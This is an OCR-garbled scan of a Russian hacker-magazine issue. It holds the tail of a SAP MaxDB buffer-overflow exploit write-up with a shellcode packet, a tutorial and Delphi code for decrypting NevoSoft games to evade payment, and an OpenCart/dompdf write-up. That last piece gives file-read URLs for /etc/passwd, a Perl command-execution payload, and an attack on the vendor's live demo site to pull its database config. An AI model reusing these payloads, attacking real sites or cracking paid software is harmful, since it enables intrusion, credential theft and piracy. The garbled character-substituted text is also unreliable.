и то, что иногда БД даже где-то встречается в жизни. Уязвимость 
нашел Абдул Аз из Харир (АЬсІиІАгіг Нагіг] из ІпзідЫТесЬпоІодіез. 
После чего успешно продал ТірріпдРоіпіХего Бау ІпіІіаНѵе. Ес- 
тественно, эксплойтами ребята не делятся. Но бывшие союзники 
по Восточному Блоку, венгерская команда 52 Сгеѵѵ, опубликова- 
ла боевой эксплойт, реализующий эту уязвимость совершенно 
бесплатно. Результат работы — шелл на 4444 порту с правами 
системы. 

МііШі 

Сервер, отвечающий за ТС Р-соеди нения с БД, открывает 721 0 порт. 
Любой желающий может попытаться аутентифицироваться в БД че- 
рез этот порт. Но перед этим надо пройти процедуру «рукопожатия», 
чтобы сервер «запомнил», кто ты, и выделил под тебя ресурсы. Во 
время этой процедуры сервер разбирает пакеты специального фор- 
мата, и в первом же пакете от клиента он считывает длину последу- 
ющих данных, а затем копирует эти данные из пакета в стек согласно 
считанному размеру. Но тут проблема — буфер в стеке не динамичес- 
кий, и поэтому, если указанная в пакете длина больше выделенного в 
стеке места, происходит классическое переполнение буфера. Пакет 
выглядиттак: 

гек = " \х08\хк1\ха0\х00 " # НС 



раскек = ( 

" \х63 \х00\х00\х00\х03 \х2 к\х00\х00\х01\х00\х00\х00 " 

" \хкк\хкк\хкк\хк:1:\х00\х00\х04\х00\х63 \х00\х00\х00 " 

" \х00\х02 \х4Ь\х00\х04\х09\х00\х00\х44\х20\х00\х00 " 
"\х00\х00\х00\х00\х00\х00\х00\х00\хкк\хкк\хкк\хкк" 

" \х6с1\х61 " + гек + " \х00\х00\х00\х00\х00\х00 " 

" \х00\х00\х00\х00\х07\х49 " + "А"*5000 + "ТООШТООШ" + зс 
+ "\х41" * 2500 + еддкипкег + " \х90 " *2 500 ) 

Алгоритм прост— перезаписываем адрес возврата на едд-ЬипІег 
шелл -код (переменная ед дЬипІе г], который ищет в памяти боевой 
шелл -код (переменная зс]. Последний идет сразу после метки 
“Т00ѴѴТ00ѴѴ”. Именно эту метку и ищет едд-ЬипІегв памяти. Как 
обычно бывает, при запуске любого эксплойта выясняется, что он не 
работает. 

Та ки сейчас — после запуска у меня не получилось никакого шелла. 
Зато умерла БД. Запустив БД и повесив дебаггер, я увидел, почему 
сплойт не сработал — адрес возврата направлял в несуществующую 
область памяти. Я нашел в стеке адрес едд-ЬипІег шелл-кода, поме- 
нял зашитый в эксплойт адрес, и все получилось — я увидел закон- 
ный шелл. Непонятно только, зачем авторами вообще используется 
едд-ЬипІег шелл-код, ведь можно было бы адрес возврата сразу 
подобрать под боевой шелл-код. Нуда ладно, главное работает. 



ІОШЛОМ 



Обнови 5АР МахОВ до актуальной версии, зс 
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Казуальное 

вскрытие 

в палевых условиях 

ИССЛЕДОВАНИЕ ЗАЩИТЫ КАЗУАЛЬНЫХ ИГР 

Казуальная игра - компьютерная игра, предназначенная для широкого круга 
пользователей. Сам термин «казуальная» происходит от латинского слова 
«сазиаііз», что означает «случайный». Таким образом, казуальная игра - это игра, 
в которую играют от случая к случаю, между делом, чаще всего, чтобы как-то убить 
время. Подобными игрушками являются творения компании НевоСофт. Только вот 
дают они поиграть всего час, а потом просят денег. Сегодня мы с этим разберемся! 



НЕМНОГО ТЕОРИИ 

Вообще, казуальные игры по своему уровню сложности годятся прак- 
тически для любой категории пользователей компьютера. Зачастую 
время на прохождение таких игр невелико, а потому они хорошо под- 
ходят для тех, кто не может уделять игре много времени. Компания 
НевоСофт является одним из ведущих разработчиков казуальных игр 
в мире (и, в частности, на русском языке). Казалось бы, такая серьез- 
ная компания должна уделять повышенное внимание защите своего 
программного обеспечения, для ее взлома должно понадобиться 
много сил и времени. Сегодня мы опровергнем этот факт и покажем, 



как отучить их детище клянчить наши с вами кровные деньги. 
Разработчики компании НевоСофт держат под своим чутким надзором 
тысячи игр, при этом дают народу опробовать их детище в течение 
одного часа. После 60 минут, когда человек только входит во вкус, 
высвечивается не очень приятная табличка, которая просит денежек. 
Так уж сложилось, что русский человек не любит платить за софт, 
но разработчики игр иногда просто не оставляют нам выбора. Для 
определенной игры нужно найти свой кряк, на поиски которого иногда 
уходят драгоценные минуты и часы, а если игра новая, то вероятность 
найти его сводится к нулю. 
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Подозрительное сходство файлов наталкивает 
на мысль о том, что игра получается путем каких- 
либо манипуляций с файлом пздате.сіаі 



ПОДГОТОВКА ОПЕРАЦИОННОГО СТОЛА 

В качестве подопытного для нашего исследования, которого мы 
будем отучать от «вредной привычки», я выбрал игру «Полцарства за 
принцессу». Мой выбор пал на нее, потому что именно она и натолкну- 
ла меня на мысль об исследовании защиты игр от НевоСофта. Позже 
выяснилось, что принцип защиты у других игр этого производителя 
абсолютно идентичен. 

Так сложилось, что на момент изучения под моей рукой не было ни 
одной программы для взлома: ни дизассемблера, ни отладчика; был 
только набор программ, стоящих на машине практически у каждого 
пользователя. В этот набор вошли Тоіаі Соттапбег и «Диспетчер 
задач» — именно этими программами мы и будем пользоваться в 
момент изучения игры. Казалось бы, что можно сделать при помощи 
этих приложений? Оказалось, что при наличии пытливого ума и ка- 
пельки внимательности этого вполне достаточно, чтобы заставить игру 
работать без ограничения по времени. В качестве платформы для на- 
писания «таблетки» я выбрал ОеІрЫ 7. Все инструменты разложены на 
операционном столе, пациент крепко привязан — можно приступать к 
исследованию. А теперь обо всем по порядку... 

СКАЛЬПЕЛЬ. ТАМПОН. СПИРТ. 

ЕЩЕ СПИРТ, ОГУРЕЦ... ПОМЯНЕМ! 

Устанавливаем и запускаем игру. Видим красивое окошко, в котором 
красуется время, отведенное нам для ее тестирования. Смело тыкаем 
мышкой по кнопке «играть» и начинаем наблюдать, что творится в 
системе. Свернем игру на время и заглянем в «Диспетчер задач». 
Взгляд падает на неизвестный нам процесс с расширением *.1тр. 

Что ж, давай глянем, что это за фрукт, и как он тут оказался. Тыкаем в 
свойства процесса и вчитываемся в информацию, которую нам выда- 
ли. Месторасположение файла говорит о том, что мы на верном пути. 
Открываем папку с этим файлом и переименовываем его в ехе’шник 
(кстати, файл является скрытым, так что не забудь поставить галоч- 
ку на «отображать скрытые файлы» в соответствующих свойствах]. 
Тыкаем в него два раза левой кнопкой мыши и видим прекрасную 
картину — игра запускается, причем никаких окон для регистрации 
не выскакивает. Казалось бы, цель нашего эксперимента достигнута, 
игра больше не требует регистрации и работает без ограничения по 
времени. Но этот способ слишком нудный и неудобный. Поэтому будем 
искать способ упростить эти действия. 

ВСКРЫТИЕ ПОКАЗАЛО. НТО ПАЦИЕНТ УМЕР ОТ ВСКРЫТИЯ 

Основная наша цель — научится отучать игрушки ЫеѵоЗоІі'а от денег 
в два клика, поэтому начнем разбираться, откуда берется тот злос- 
частный файл с расширением *.Тппр. Не бойся, читать тонны мануалов 



будем, а вместо этого берем лопату побольше да поострее и начинаем 
копать поглубже. Первое, что приходит на ум - сравнить эти два файла 
и посмотреть, в чем же их отличие. Откроем Тоіаі Соттапсіег и вос- 
пользуемся внутренней утилитой для сравнения файлов. Результаты 
сравнения очень интересные, так как наблюдается красивая картина: 
с периодичностью в 2 байта идет различие и совпадение. Налицо 
криптография исполняемого файла, но как провести обратный про- 
цесс, ведь мы решили отказаться от отладчиков и дизассемблеров? 
Ответ очень прост — нужно вспомнить алгоритмы шифрования. Самым 
простым и одним из самых эффективных (при правильном использо- 
вании] криптоалгоритмов является так называемое ХОР-шифрование. 
Напомню, в данном методе побайтно проводится булева операция 
ХОР. Первой переменной является байт для шифрования, а второй 
— ключ. Но перед нами тут же встает еще один вопрос — где взять 
ключ для дешифровки? Ответ прост. Нужно только вспомнить булеву 
алгебру, и ключ нам дадут в открытом виде. 

Сгуріесі = ипсгуріесі ХОК кеу; 

Кеу = сгуріесі ХОК ипсгуріесі 
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нааю: тт 


44 


за 


7І 


ГО 


02 


33 ЕЕ 


1 




042010: ЕС 


сс 


«2 


ТЕ 


ев 


АА 


39 ЕЕ 


1 




МЭ01В: ОГ 


ВО 


іі 


01 


00 


00 


33 4І 


1 ш 




041011: 04 


23 


ВЕ 


ОГ 


за 


АВ 


35 46 


1 




МО»: и 


ОТ 


25 20 


2в 


іг 


00 ээ 


1 одие X 




04-І020: 8Г 70 


36 


36 


БЭ 


ЕЛ 


00 39 


1 црЦаъ Ш 




142026: ЬС 


24 


ГО 


59 


44 


24 


ГО 39 


1 ЧІЗЕВіЗХ, 




042021 : С7 


вс 


ГО 


39 


ЗГ 


ВС 


10 39 


і тягЕджл; 




143030 : 61 


14 


ГО 39 


ВБ 


Г4 


зз гг 


1 ТИЕ"ЕПв 




041030: СГ 


вс 


10 


35 


СВ 


ВС 


35 БЕ 


1 ПК2Б)=е 




143030: М 


41 


24 


ІО 


зв 


31 


зг го 


1 ЩР4ЭИС34* 




04-1034: 4 2 


34 


40 


43 


>9 


ЗГ ГО 


1 вміэсуй* 




143040: 30 


03 


ГС 


С4 


оь 


ТА 


4Е ЕВ 


1 ЭЩиДР=Кі 




042040: 4Е 


71 


ГЕ 


С4 


01 


за 


4Е 9А 


1 ГчэЯАТТк 




14 304 В ; ВС 


04 


ээ 


эв 


ВО 4І ОВ 30 


і ѵоэ&га 




041041: СО 


АС 


ВО 


31 


10 


ЕЕ 


01 33 


1 Н’ЛМЗ 




>4 3060; Он 


ВО 


к 


ге 


ББ 


йй 4' эе 


і ішірчмпаі 




04Ю60: 43 


2Б 


63 


Е6 СЕ 


26 


43 35 


і стропе: 




>4 2061: 89 


ІК 


00 


В9 


4Е 


04 


18 ГС 


1 ІУ ЪЖОсЗ 




042011: 12 


ТО 


00 


19 


ЗЕ 


АС 


ЕЕ 13 


1 съ иъю 




14 30 СО: В-7 


ГС 


ГТ 


33 


XX 


Зі 


ВО 00 


і исвд 




041040: ІС 


М 


ТТ 35 


Ті 


70 


ІЗ 00 


1 пгезрі 


- 



Выясняем, что шифрованию подвергаются только 
первые $43000 байт 



Попробуем достать заветный ключик. Для этого проведем побитно 
операцию ХОР между исполняемым файлом и временным файлом. 

По идее, на выходе получим ключ для дешифровки, с помощью 
которого можно будет щелкать игры как орешки. ХОР’ить будем только 
первые 256 байт, так как мало кто в наше время использует ключи 
большей длины. 

ѵаг 

і, о: ТРіІеЗігеат; 

Ьі , Ьо:Ьуіе; 
х, іі, сс:іпіедег; 

Ьедіп 

ІЩ ореп.Рхесиіе іЬеп 
Ьедіп 

ЗеіСиггепіБіг ( ' С : \Игры от ЫеѵоЗоіС\РеасесгаіС\ 
дате ' ) ; 

//Переходим в папку с игрой 
іі поі ( іііеехізіз ( ' пздате . баб ' ) ) іЬеп ехіі; 



не придется, главное - иметь чуточку терпения и капельку внима- 
тельности. Искать долго не приходится, ибо в папке с файлом *Птр 
лежит непонятно зачем нужный файл пздате. сіаі, который по размеру 
совпадает с нашей игрушкой с точностью до байта. Можно предпо- 
ложить, что ланчер просто переименовывает пздате. баі в *Птр и 
запускает его. Но в процессе проверки нашего предположения тебя 
ждет большой облом — нас посылают куда подальше, сообщая о том, 
что приложение не является исполняемым файлом. Расстраиваться не 



і : =ТРііеЗігеат. Сгеаіе ( ' пздате . баб * , бтОрепКеаб) ; 
о : =ТРі 1 е 8 бгеат. Сгеабе ( ореп . РіІеКате , бтОрепКеаб) ; 
х : = 0 ; іі:= 0 ; сс:= 0 ; 

//перебираем 256 байт 
бог х :=0 іо 255 бо 
Ьедіп 

і . геаб (Ьі , 1 ) ; 
о . геаб (Ьо , 1 ) ; 
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взлом 



кеу . Саркіоп : =когтак ( ' %з %х 1 , [кеу . Саркіоп, (Ьі 
хог Ьо) ] ) ; 

іпс (сс) ; 

й/і сс той 8 =0 ккеп кеу . Сарк іоп := кеу . 
Саркіоп+#13#10 ; 
епй; 
і . Ргее ; 

0 . Ргее ; 
епй; 

Как оказалось, ключ, используемый для шифрования, не очень-то 
большой: длина его составляет всего 4 байта. Забегая вперед, скажу, 
что для каждой игры от компании НевоСофт существует уникальный 
ключ шифрования. Какже его вычислить?! 

Углубляться в дебри не стоит. На самом деле все очень просто — для 
получения ключа берем от сигнатуры РЕ-заголовка первые 2 байта и 
проводим операцию ХОР. У многих возникнет вопрос: почему нужно 
проводить операцию ХОР только на 2 байта, ведь длина ключа — 4 
байта? Ответ прост — 3-й и 4-й байты в ключе всегда равны $00. 

сопзк 

скеу = # 7 7 # 9 0 ; // сигнатура РР -файла 

Ьедіп 

і : =ТРі1е8кгеат. Сгеаке (РіІеЫате , ктОрепКеай) ; 

ког х : =1 ко 2 йо 
Ьедіп 

1 . Кеай ( ктр ,1); 

ктр : =огй (скеу [х] ) хог ктр; 
кеу : =кеу+сЪ.г (ктр) ; 
епй; 

кеу : =кеу + # 0 # 0 ; 

Теперь в наших руках есть заветный ключ-монтировка, и можно смело 
приступать к написанию самой программы для взлома. 



ТСРДР 



Ъешгііу | Епѵігоптепі 



Еілпдк 



Ітаде РегЬгтапсе РеНЬгтапое ОгарЬ ТЬгеаПз 

Ігплде Рііе 



Ѵегніог: п/а 

Тіппе: 20.09.2009 23 : 0 ? 



Райі: 

: С* 'Игры от 1 ^е , ѵ 05 ок 1 1 'РеаС&стоіН^йітіе‘(Е‘ ;: іАІІѴ‘/Еі 5 . Ьлр 
Сотталгі Йпе: 



Сілгепі гіігесЬгу; 



о^ігры от Ыеѵо$оАѴ%кесга№іоа<№Ѵ^Ь\ 



Рагепі: гцп.ехе{1396*4} 

изег: МІСДОВОР^ЗДАДЕѴМтіп 

5іаг \ 23:07; 26 20*09, 2009 



Согшпепк 



| Вгіпд іо Ртопі | 
| ЮЛ Ргосезз | 



□Ыа Ехеоійоп Ргоіесйол (рЕР) ЗіэЬиз: ИиЫеН 



ОК 



Сапсеі 



Вычислив подозрительный процесс в системе, 
обнаруживаем, что он находится в папке с игрой 
— стоит к нему внимательнее приглядеться 



МЫ ПИСАЛИ. МЫ ПИСАЛИ. НАШИ ПАЛЬНИКИ УСТАЛИ... 

Мы уже обладаем достаточной информацией для написания универ- 
сального взломщика. Что ж, не будем зря терять время. Приступим... 




Описание игры 



_ — I Пол царства за принцессу 

Полцорства за принцессу 




[дашшдшв) 

(43.69 Мб) 

(РІазЬ- версия Пол царства за 
принцессу онлайн) 

Скриншоты из игры 
Полцарства за принцессу: 







ЭКСКЛЮЗИВНО на Неѵо5оГ(.пі 

Однажды принцесса Елена приехала в гости к 
своему дяде, королю Сигизмунду* Король был 
задорным лысым стариком и много шутил о том, 
как он шлепал принцессу по попке, когда она 
была маленькая, а теперь ока такая большая, 
что сама кого хочешь, отшлепает. "Замуж! 

Замуж тебе пора! 11 делал вывод Сигизмунд, 
запивая севрюгу компотом. Как вдруг... 

Начался ураган, какого не было уже лет 200. Он 
опустошил сады и поля, сорвал крыши с домов, 
завалил дороги камнями и деревьями* В 
довершение всех бед, ураган разбудил дракона 
Огнедона, который мирно зимовал в своем 
ущелье. Теперь не выспавшийся ящер хулиганил 
по ночам, доводя бедных жителей до истерики* 
Из дома Елены по голубиной почте пришло 
письмо, что ее отец болен, и ей срочно нужно 
ехать домой, на другой конец королевства. Но 
дороги непроходимы, селения по пути 




Любимая, а главное — бесплатная игрушка 



► 052 
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Вычисляем ключ для дешифровки путем 
проведения операции ХОР на первые байты игры 
и файла пздате.сіаі 



іпс (іі) ; 

i . КеаЬ (Ьі , 1 ) ; 

Ьо:=Ьі хог огЬ (кеу [ іі ] ) ; 

Ьиііег . Ѵйгііе (Ьо , 1 ) ; 
іпс (х) ; 

ii іі =4 іЬеп і і : = 0 ; 
епЬ; 

о .Мгііе (Виііег .Метогу' 4 , Виііег.зіге) ; 
і . Ргее; 
о . Ргее; 

Ьиііег . Ргее; 

ѳЬомшеззаде ( 1 Шгарріпд Ьопе * ) ; 
епЬ; 

Звучит барабанная дробь — запускаем полученный файл... Но 
почему-то нам снова предлагают пройти в сторону леса. Что, где, 
когда мы пропустили?! Ведь вроде бы все правильно сделали! Но 
не будем расстраиваться. Взяв в руки очередную баночку пива, 
продолжим изучать подопытного и попробуем найти наш промах. 
Вновь открываем Тоіаі Сотппапбег и проводим работу над ошибка- 
ми, сравнивая нормальную игру с файлом, который у нас получился. 
На первый взгляд файлы одинаковы с точностью до одного байта. 
Но стоит только нажать кнопку «найти первое различие», ТоЫ 
Соттапбег сообщает, что, начиная со смещения $43000, файлы не 
совпадают. 

Следовательно, можно предположить, что шифруется не весь 
файл, а только первые $43000 байт. Поэтому берем в руки молоток 
и зубило и исправляем ошибки в нашем коде, заставив дешифро- 
вать только первые $43000 байт. 



ргосеЬиге шгар ( іііепаше : зігіпд) ; 
ѵаг 

і, о: ТРіІеЗігеат; 

Ьі , Ьо , ітр : Ьуіе ; 
х, іі:іпіедег; 
кеу : зігіпд [4 ] ; 

Ьиііег : ТМетогуЗігеат; 
сопзі 

скеу = #77#90 ;/ /сигнатура РЕ-заголовка 

Ьедіп 

іі поі ( іііеехізіз ( іііепаше) ) іЬеп ехіі; // неболь- 
шая проверка никогда не повредит =) 

і : =ТРі1еЗігеат. Сгеаіе ( іііепаше , ітОрепКеаЬ) ; //от- 
крываем на чтение подопытного 

о : =ТРі1еЗігеат. Сгеаіе (СЬапдеРіІеЕхі ( іііепаше , 

' . ехе ' ) , ішСгеаіе) ;//и на запись новый файл 
Ьиі іег : =ТМешогуЗігеаш . Сгеаіе ; 

іог х:=1 іо 2 <іо // вычисляем крипто-ключ 
Ьедіп 

і . КеаЬ ( ітр ,1); 

ітр : =огЬ (скеу [х] ) хог ітр; 

кеу : =кеу+сЬг ( ітр ) ; 

епЬ; 

кеу : =кеу+#0#0 ; 

і . Зеек ( 0 , зоРготВедіппіпд) ; 
х : = 0 ; і і : = 0 ; 

ѵ/ЬіІе і . Розіііопсі . Зіге Ьо // дешифруем файл с ука- 
занным ключом 
Ьедіп 



ѵіЬіІе і . Розіііоп<і . Зіге Ьо 
Ьедіп 

іпс (іі) ; 
і . КеаЬ (Ьі , 1 ) ; 
іі х< $43000 іЬеп 
Ьедіп 

Ьо : =Ьі хог огЬ(кеу[іі]); 

Ьиііег .Мгііе (Ьо, 1) ; 
епЬ 
еізе 

Ьиііег .Ѵ7гііе (Ьі , 1) ; 
іпс (х) ; 

іі іі=4 іЬеп іі:=0; 
епЬ; 

Запускаем наш «взломщик» (впрочем, эти действия сложно назвать 
взломом, так как мы не модифицируем ни одного байта, непосред- 
ственно относящегося к игре, а лишь восстанавливаем исходное 
приложение путем дешифрования]. Пару секунд ожидания; запускаем 
игру. Нашей радости нет предела, так как теперь игра абсолютно не- 
зависима от ІЧеѵоЗоіі'овского ланчера, который клянчит у нас деньги. 
Теперь можно расслабиться и, откинувшись в кресло, наслаждаться 
любимой игрушкой. 

ЗАКЛЮЧЕНИЕ 

Отличие хакера от обычного человека заключается не только в 
высоком уровне познаний ІТ-технологий, а в первую очередь в его 
любознательности и способности находить нестандартный подход к 
обычным делам. Исследование, которое мы сейчас произвели, до- 
казывает еще один факт — для взлома не всегда нужно часами сидеть 
в отладчике, выискивая заветные байты, которые нужно пофиксить; 
иногда можно обойтись и теми программами, которые у нас всегда под 
рукой. За сим прощаюсь и рекомендую всегда блюсти ст. 272-274 УК 
РФ — и будет тебе счастье! :] т 
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ВЗЛОМ ДВИЖКА ОНЛАЙН-МАГАЗИНА ОРЕШКТ 



ВОТ ОНА, ВЕСНА - время депрессий, мартовских котов и дождей. Делать что-либо 
совсем не было желания, но, как назло, у меня освободилась пара вечеров. 

Терять это драгоценное время очень уж не хотелось, поэтому я решил потренировать 
глаза, покопавшись в РНР-движках. Ну, а вдруг чего выгорит? Чтобы узнать, 
что же все-таки вышло из комбинации ОрепСагІ, пары вечеров и пары литров кофе, 
читай дальше. 



ДЕЛО БЫЛО ВЕЧЕРОМ 

Принялся я за поиски уязвимостей, накачав 
самых разных движков последних версий. 

В процессе изучения оных остановился на 
движке онлайн-магазина ОрепСагІ: версии 
1.4.6. Запустил самопальный баш-скрипт для 
поиска подозрительных функций. 

Среди всего прочего кода, который выдал 
скрипт, мое внимание привлекла следующая 
строка: 

еѵаі ( " ? " .">$зСг" ); 

Ну-ка глянем, что там у медвежонка внутри. 
Этот подозрительный кусок кода находится в 
файле зузіепп/ЬеІрег/ботрбіУіпсЫе/ботрсІб 



сіз.рбр, на строке 276 — туда и направимся. 
Открываем файл и видим, что находимся 
внутри метода ІоасІ_Ы:тІ(], который при- 
нимает переменную $з1т, и на данном этапе 
она никак не фильтруется. Но, так как в этом 
файле находится только один класс, нам надо 
найти точку вхождения — скрипт, который до- 
ступен извне и работаете классом ООМРСР. 
Уровнем выше, в самой папке ботрсіб лежат 
разные скрипты; начнем перебирать их в 
браузере. Открываем первый попавшийся, а 
это ботрсІбрЬр! Видим, что скрипт ругается, 
мол, не хватает ему входных параметров. Из 
ошибки понятно, что ему нужно получить 
Ф^ЗЕТПприМіІе']. Ну что же, удовлетворим 
его, но предварительно посмотрим, что 



находится внутри самого скрипта. А внутри 
— мешанина всяких условий. Чтобы узнать, 
как далеко скрипт выполнился, я обычно рас- 
ставляю в самых разных местах отладочные 
сообщения типа: 

ргіпС^ ( "Рііе : %з, Ііпе: %скЪг/>" , 
РІЬЕ , ЬШЕ ) ; 

Немного помучив скрипт, я установил следую- 
щее: если указать требуемый параметр іпри!:_ 
біе, то он попадает в метод ІоасІ_Ы:т 1_бі1е() 
класса ООМРОЕ. Этот метод, в свою очередь, 
пытается прочитать файл в строку при по- 
мощи функции бі 1е_де1:_соп1:еп1:5() , а затем 
передает содержимое в метод ІоасІ_Ы:ппІ(). И 
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Официальный сайт движка ОрепСагІ 



происходит все это без каких-либо фильтраций. 

То ли разработчики надеялись на то, что пользователи 
этой библиотеки будут все фильтровать, то ли они очень 
наивны и оставили все на волю судьбы. Как бы то ни 
было, это играет нам на руку. Следуя логике работы скрип- 
та, получается, что мы можем читать файлы. Проверим это 
дело. В браузере я набрал: 

ЫгСр : //1оса1ЬозС/Ъ./орепсагР_ѵ1 . 4 . 6/ир1оас1/ 
зузСет/Ъе1рег/<іотрс1Р/с1отрс1:Е . рЬр?іприР_ 

Ті1е= /еРс/раззчлкі 



О да, мы получили Мс/раззѵѵсІ в виде РОР-файла. Исходя 
из того, для каких целей служит библиотека, этого можно 
было ожидать. 

ПИШЕМ ЭКСПЛОЙТ 

Читать произвольные файлы, пусть и в такой извращен- 
ной форме — это неплохо, но хотелось чего-то большего. 
Уж очень сильно еѵаШ мозолил глаза — нельзя упускать 
возможность выполнить РНР-код. В этом случае было бы 
достаточно заинклудить любой файл, содержащий код, 
и он бы успешно выполнился. Но в своем эксплойте для 



В недрах уязвимого класса РОМРОР 



НТТР://ѴѴѴШ 



> Ііпкз 




• эепсагі.сот — 
официальный сайт 
ОрепСагН 

• З.рЬр.пеТ/ппап- 
иаІ/епЛеаІигез.бІе- 
ирІоаб.риІ-теіЬоб. 
рбр — мануал РНР 
по методу РІІТ. 
• рбр.пеТ/тапиаІ/еп/ 
ѵѵгаррегз.сІаТа.рЬр — 
мануал РНР 

по оберткам. 

• хЫѵез.пеобарзіз. 
сот/агсЫѵез/МІсІіз- 
сіози ге/2009-07/041 7. 
Ыт - сообщение 
об уязвимости 

в ООМРОР. 
• сІідіІаЦипкіез.са/ 
сІотрсЦУіпсІех.рЬр — 
сайт класса 00МР0Р. 

• по .сот/ 
рарегз/260 — бумага 
по РРІ/І_РІ от СѴѴН 
ІЧпсІегд гоипб. 
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Благоприятная реакция сІотрсН.рІір на сайте жертвы 



этого движка я хотел сделать удаленное вы- 
полнение команд без инклуда посторонних 
файлов. Начиная с версии РНР 5.2.0 поддер- 
живается обертка баіа:, которую и было реше- 
но задействовать. Протокол баіа был описан 
в 1 27 номере журнала, так что обращайся 
туда, а мы едем дальше. 

Как всегда, эксплойт я писал на своем лю- 
бимом Регі. В целом, эксплойт будет понятен 
и неискушенному в Регі человеку, но там я 
применил один трюк с башем. Чтобы тебя не 
смущать, на всякий случай поясню следую- 
щую строку: 



$стс1 = епсос!е_Ъазе64 ( $стс! 

. ' I з ей -е : а -е \'$Ш;з/\ 

п/ <Ъг\/ >/ ; Са\ ' ' ) ; 

В переменной $стсІ содержится вве- 
денная тобой команда, допустим, Із -Іа. 
Склеиваем ее с тем однострочником, 
что справа. Этот сниппет с зесі я при- 
менил лишь для того, чтобы преобра- 
зовать переносы строк в ‘ < Ь г/> ' , так как 
в полученной РЭР применяется НТМІ_- 
форматирование. В итоге получится 
следующая команда: 



Читаем очень интересный РБР-документ 




1з -Іа I зесі -е :а -е '$Ш;з/\ 
п/<Ьг\ />/ ; Да ' 

Через пайп передаем результат первой 
команды в зесі, который занимается формати- 
рованием. Все это добро мы перекодируем в 
Ьазе64 и вставляем в очередной кусок кода. 

ту $СоЬазеб4р]ір = "<?р1ір \@ 
зузСет (Ъазе64_с1есос1е ( 1 $стсГ ) ) ; " ; 
ту $рау1оай = 1 сІаСа : ; Ьазеб4 , 1 . 

епсос!е_Ъазе64 ( $СоЬазе64р1ір) ; 

Ну, а здесь тебе уже должно быть все понятно 
— очень похоже на пресловутый РНР. Сам 
эксплойт позволяет выполнять системные 
команды, а результат приходит в виде РРР- 
файла. Тут я подумал: а что, если за меня уже 
сделали всю работу? Совсем забыл погуглить 
на предмет наличия уязвимостей под этот 
движок. Поиск по последней версии ОрепСагІ: 
ничего не дал, были лишь старые уязвимо- 
сти. А вот по «ботрсИ ехріоіі» (это все-таки 
сторонняя библиотека] кое-что нашлось. 

Вещ Сагзоп из «УСЫ Еібісаі Наскег Сгоир» 
сообщал об уязвимости, которая заключается 
в том, что можно скачивать любые файлы 
в виде РЭР (что я и раскопал]. Однако мой 
эксплойт использует более широкие возмож- 
ности уязвимости, к тому же, про уязвимость в 
ОрепСагІ; сообщено не было. 

А НТО, ЕСЛИ..? 

Итак, эксплойт для движка был готов, но тут 
я вспомнил про одну вещь. Когда я скачивал 
движок, то заметил, что сайт предоставляет 
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онлайновую демо-версию. Догадываешься, о чем я? Так 
точно, мы будем штурмовать оффсайт! Не всегда, конечно, 
выпадает такое счастье как уязвимый движок на самом сайте 
разработчика, но попробовать стоит. Кто не рискует, тот не 
пьет шампанское. Первым делом я сразу полез проверять, 
что выплюнет уязвимый скрипт. В моем случае (на локальном 
сервере] он ругался на неопределенные параметры. Но в де- 
моверсии сайта вполне может быть версия скрипта посвежей 
и без уязвимости, либо вообще отсутствовать такой скрипт. 
Там часто в целях безопасности обрезают все, что только 
можно. Как бы то ни было, идем по следующей ссылке: 

сіето . орепсагС . сош/зузЦет/ЪеІрег/сіошрсіі:/ 
сіотрсіЕ_шаіп . ріір 

Скрипт ругается точно также, как и на моем сервере. Это 
хорошо, можем продолжать эксперименты. На тот момент 
была лишь одна идея — применить свежевыжатый экс- 
плойт. Набираем в консоли: 

регі сіошрсіі: .рі -и=ТШСр : / /сіешо . орепсагС . сот/ 
-с='1з -Іа' 

Смотрим результат в сохраненной РОР'ке. Открываем, 
а там ругаются: неверный формат РЭП-файла. Решил 
посмотреть, что же вообще сервер отдал в качестве 
содержания файла. Переименовал файл в текстовик, а 
внутри ошибка РНР: 

ІШЬ ііііе-ассезз із сІізаЫес! іп СЬе зегѵег 
соп^ідигаСіоп іп. . . 

И бла-бла-бла. Это могло означать, что у них на сервере 
РНР сконфигурирован как аІІоѵѵ_игІ_йэреп=о^. При таком 
раскладе протокол баіа не работает, и, естественно, РРІ 
тут тоже не пройдет. Обидно, конечно, но меня это не оста- 
новило — я решил искать другой способ заполучить шелл 
на оффсайте движка. 

Кстати, на локальном сервере желательно иметь ту же 
конфигурацию, что и на уязвимом, чтобы максимально 
приблизить обстоятельства локального тестирования к ре- 
альным. Поэтому я и у себя выставил а Иоѵѵ_и г1_Ро ре п=о1 : б, 
чтобы в будущем не наступать на грабли. Однако, когда 



тестируешь движки, стоит настраивать РНР на самую 
мягкую конфигурацию. 

СЕРИЯ НЕУДАЧ... 

Сначала я хотел посмотреть, как работает уязвимость на 
оффсайте движка. Вдруг читать файлы вовсе не получит- 
ся? Но чего гадать — набираем в браузере: 

ІЩЦр : / /сіешо . орепсагС . сош/зузСет/ 
ЪеІрег/сіотрсіН/сіотрдН .р]ір?іпріЩ_ 
ііі1е= /еДс/раззжІ 

И скачиваем РЭР-файл со списком пользователей си- 
стемы. Неплохо, но это нам мало поможет. Я принял- 
ся за поиски конфигурационных файлов в надежде 
найти аутентификационные данные. Прямо в корне 
системы ОрепСагІ лежит сопРд.рбр. Но имей ввиду, 
что, прежде чем скачивать РНР-файл, нам надо его 
во что-нибудь преобразовать, иначе он просто вы- 
полнится как код. Значит, ядовитый ІІВІ_ приобретает 
такой ВИД: 




> сіѵсі 

На диске ищи 
видеоролик, 
демонстрирующий 
взлом, баш-скрипт для 
поиска уязвимостей, 
а также оба 
эксплойта для 
движка Ореп- 
Сагі (только для 
ознакомления]55 



ііДСр : / /сіешо . орепсагС . сош/зузСеш/ЬеІрег/ 
сіошрсі^/сіотрсіЕ .р!ір?іпри1і_Еі1е=р]тр $ // 



Мой баш-скрипт для поиска уязвимостей за работой 
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ТіІЦег/сопѵегЦ . Ъазе64-епсосіе/ 
гезошгсе= /сопіід . рітр 

Здесь я использовал фильтр потока, который 
появился в РНР с версии 5.0.0. Таким об- 
разом, прочитанный файл преобразуется в 
строку, закодированную при помощи Ьазе64. 
Между прочим, хороший способ читать 
бинарники. Итак, используя уязвимость, я 
успешно скачал содержимое файла в виде 
РОЕ. Раскодировав обратно полученную стро- 
ку, я получил следующее: 

<?рЪ.р 
// БВ 

сіеіііпе ( 1 БВ_БКІѴЕК 1 , 1 шузді ') ; 

сЗеНпе ( ' БВ_НО 8 ТЫАМЕ ' , 

1 ІосаІТюзБ ' ) ; 
сіеТіпе ( ' БВ_Б8ЕІШАМЕ ' , 

' орепсагБ_изег 1 ) ; 
сіеіііпе ( ' БВ_РА8 ЗілЮКБ ' , 

